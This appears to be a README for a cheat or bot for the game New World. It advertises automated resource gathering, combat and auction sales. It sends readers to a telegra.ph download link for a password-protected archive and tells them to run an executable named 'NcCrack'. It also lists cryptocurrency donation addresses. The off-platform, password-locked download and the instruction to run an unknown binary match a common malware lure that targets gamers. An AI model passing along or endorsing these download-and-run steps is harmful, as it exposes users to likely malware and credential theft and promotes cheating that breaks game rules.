# PIXEL-BOT-NEW-WORLD-Resource-extraction-mob-killing

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server

-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Support the author ( On chips )

- BTC - bc1q7kmj3pyhcm2n02z6p7gxvusqv55pt7vcgxe6ut

- ETH - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

- TRC-20 ( Usdt ) - TRYhDuV6qVcHQjfqEgF15w72TdxCMLDt9b

- BNB - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

# Functions

# The bot is ready 

- it can collect any resources, automatically return to the warehouse and unload, there is a simple combat system (the developer is finalizing it), and you can also write any routes (profiles) for your farm. The bot has an automatic auction sale (This function will be further developed). It is very easy to write a profile, we have provided an interface for users, that is, you do not need to know something in the code (User-frindly-interfice). The bot is fully automated - there are several obstacle avoidance systems, also from getting stuck. During our own testing, we found a number of small problems in the work of the bot, the developer is now promptly engaged in fixing.
